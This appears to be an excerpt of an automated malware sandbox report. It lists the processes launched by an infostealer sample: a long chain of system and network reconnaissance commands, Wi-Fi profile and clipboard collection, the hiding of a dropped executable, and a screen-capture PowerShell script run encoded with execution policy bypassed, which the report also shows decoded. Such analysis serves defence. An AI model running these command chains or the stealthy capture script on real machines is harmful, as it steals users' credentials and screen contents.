            Source: C:\Windows\System32\cmd.exeProcess created: Base64 decoded $source = @"using System;using System.Collections.Generic;using System.Drawing;using System.Windows.Forms;public class Screenshot{ public static List<Bitmap> CaptureScreens() { var results = new List<Bitmap>(); var allScreens = Screen.AllScreens; foreach (Screen screen in allScreens) { try { Rectangle bounds = screen.Bounds; using (Bitmap bitmap = new Bitmap(bounds.Width, bounds.Height)) { using (Graphics graphics = Graphics.FromImage(bitmap)) { graphics.CopyFromScreen(new Point(bounds.Left, bounds.Top), Point.Empty, bounds.Size); } results.Add((Bitmap)bitmap.Clone()); } } catch (Exception) { // Handle any exceptions here } } return results; }}"@Add-Type -TypeDefinition $source -ReferencedAssemblies System.Drawing, System.Windows.Forms$screenshots = [Screenshot]::CaptureScreens()for ($i = 0; $i -lt $screenshots.Count; $i++){ $screenshot = $screenshots[$i] $screenshot.Save("./Display ($($i+1)).png") $screenshot.Dispose()}
            Source: C:\Windows\System32\cmd.exeProcess created: Base64 decoded $source = @"using System;using System.Collections.Generic;using System.Drawing;using System.Windows.Forms;public class Screenshot{ public static List<Bitmap> CaptureScreens() { var results = new List<Bitmap>(); var allScreens = Screen.AllScreens; foreach (Screen screen in allScreens) { try { Rectangle bounds = screen.Bounds; using (Bitmap bitmap = new Bitmap(bounds.Width, bounds.Height)) { using (Graphics graphics = Graphics.FromImage(bitmap)) { graphics.CopyFromScreen(new Point(bounds.Left, bounds.Top), Point.Empty, bounds.Size); } results.Add((Bitmap)bitmap.Clone()); } } catch (Exception) { // Handle any exceptions here } } return results; }}"@Add-Type -TypeDefinition $source -ReferencedAssemblies System.Drawing, System.Windows.Forms$screenshots = [Screenshot]::CaptureScreens()for ($i = 0; $i -lt $screenshots.Count; $i++){ $screenshot = $screenshots[$i] $screenshot.Save("./Display ($($i+1)).png") $screenshot.Dispose()}
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeProcess created: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe "C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe"Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "ver"Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic computersystem get Manufacturer"Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "gdb --version"Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist"Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path Win32_ComputerSystem get Manufacturer"Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist"Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe""Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist"Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "cmd.exe /c chcp"Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "cmd.exe /c chcp"Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe Get-Clipboard"Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profiles"Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeProcess created: unknown unknownJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get nameJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic computersystem get ManufacturerJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklistJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path Win32_ComputerSystem get ManufacturerJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +h +s "C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c chcp
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c chcp
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Get-Clipboard
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfo
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\HOSTNAME.EXE hostname
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic logicaldisk get caption,description,providername
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net user
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\query.exe query user
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net localgroup
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net localgroup administrators
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net user guest
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net user administrator
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic startup get caption,command
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /svc
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ipconfig.exe ipconfig /all
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ROUTE.EXE route print
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ARP.EXE arp -a
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\NETSTAT.EXE netstat -ano
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc query type= service state= all
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh firewall show state
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh firewall show config
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profiles
            Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 user
            Source: C:\Windows\System32\query.exeProcess created: C:\Windows\System32\quser.exe "C:\Windows\system32\quser.exe"
            Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 localgroup
            Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 localgroup administrators
            Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 user guest
            Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 user administrator
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "echo ####system info#### & systeminfo & echo ####system version#### & ver & echo ####host name#### & hostname & echo ####environment variable#### & set & echo ####logical disk#### & wmic logicaldisk get caption,description,providername & echo ####user info#### & net user & echo ####online user#### & query user & echo ####local group#### & net localgroup & echo ####administrators info#### & net localgroup administrators & echo ####guest user info#### & net user guest & echo ####administrator user info#### & net user administrator & echo ####startup info#### & wmic startup get caption,command & echo ####tasklist#### & tasklist /svc & echo ####ipconfig#### & ipconfig/all & echo ####hosts#### & type c:\windows\system32\drivers\etc\hosts & echo ####route table#### & route print & echo ####arp info#### & arp -a & echo ####netstat#### & netstat -ano & echo ####service info#### & sc query type= service state= all & echo ####firewallinfo#### & netsh firewall show state & netsh firewall show config"
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaia
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaiab
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaiaJump to behavior
